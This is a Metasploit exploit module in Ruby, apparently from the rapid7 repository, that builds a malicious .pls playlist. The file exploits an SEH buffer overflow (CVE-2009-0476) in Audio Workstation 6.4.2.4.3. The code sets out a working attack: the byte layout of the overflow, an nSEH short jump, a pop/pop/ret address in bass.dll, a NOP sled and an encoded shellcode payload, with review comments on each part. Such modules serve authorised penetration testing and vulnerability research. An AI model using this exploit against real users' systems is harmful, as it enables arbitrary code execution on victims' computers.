GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audio_wkstn_pls.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
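class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # SEH overwrite in Audio Workstation 6.4.2.4.3 triggered by an oversized
  # .pls playlist. The module only writes the file to disk; it starts no
  # payload handler (DisablePayloadHandler), so a listener for the chosen
  # payload has to be run separately and the file delivered to the victim.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
          When opening a malicious pls file with the Audio Workstation,
          a remote attacker could overflow a buffer and execute
          arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'germaya_x', 'dookie' ],
        'References' => [
          [ 'CVE', '2009-0476' ],
          [ 'OSVDB', '55424' ],
          [ 'EDB', '10353' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
          # File-format exploit: nothing listens here, use a separate handler.
          'DisablePayloadHandler' => true,
          'AllowWin32SEH' => true
        },
        'Payload' => {
          'Space' => 4100,
          # Only NUL is excluded; the AlphanumUpper encoder keeps the payload
          # itself printable. The nSEH/SEH bytes and the NOP sled are written
          # raw, so any further bytes the .pls parser mangles would have to be
          # added here -- NOTE(review): confirm against the target parser.
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          # A boolean flag, not the string 'True' (both are truthy, but the
          # option is a flag). The sled is built explicitly in #exploit.
          'DisableNops' => true,
        },
        'Platform' => 'win',
        'Targets' => [
          # pop/pop/ret in bass.dll. "Universal" presumably because the gadget
          # lives in the application's bundled DLL rather than a system DLL --
          # verify the address still holds for the bass.dll shipped with the
          # affected build before relying on it.
          [ 'Windows Universal', { 'Ret' => 0x1101031E } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2009-12-08',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
      ]
    )
  end

  # Builds the malicious playlist and writes it via FILEFORMAT#file_create.
  #
  # Layout (always 6000 bytes in total):
  #   1308  uppercase filler up to the SEH record
  #      4  nSEH: short jump (EB 16) + two NOPs; the jump skips the SEH
  #            address and lands 16 bytes into the sled below
  #      4  SEH:  pop/pop/ret address from the selected target
  #     32  NOP sled
  #   <=4100 encoded payload (bounded by 'Space')
  #   rest  uppercase filler so that payload + trailer total 4652 bytes
  def exploit
    shellcode = payload.encoded

    buf = rand_text_alpha_upper(1308)
    buf << "\xeb\x16\x90\x90"
    buf << [target.ret].pack('V')
    buf << make_nops(32)
    buf << shellcode
    buf << rand_text_alpha_upper(4652 - shellcode.length)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buf)
  end
end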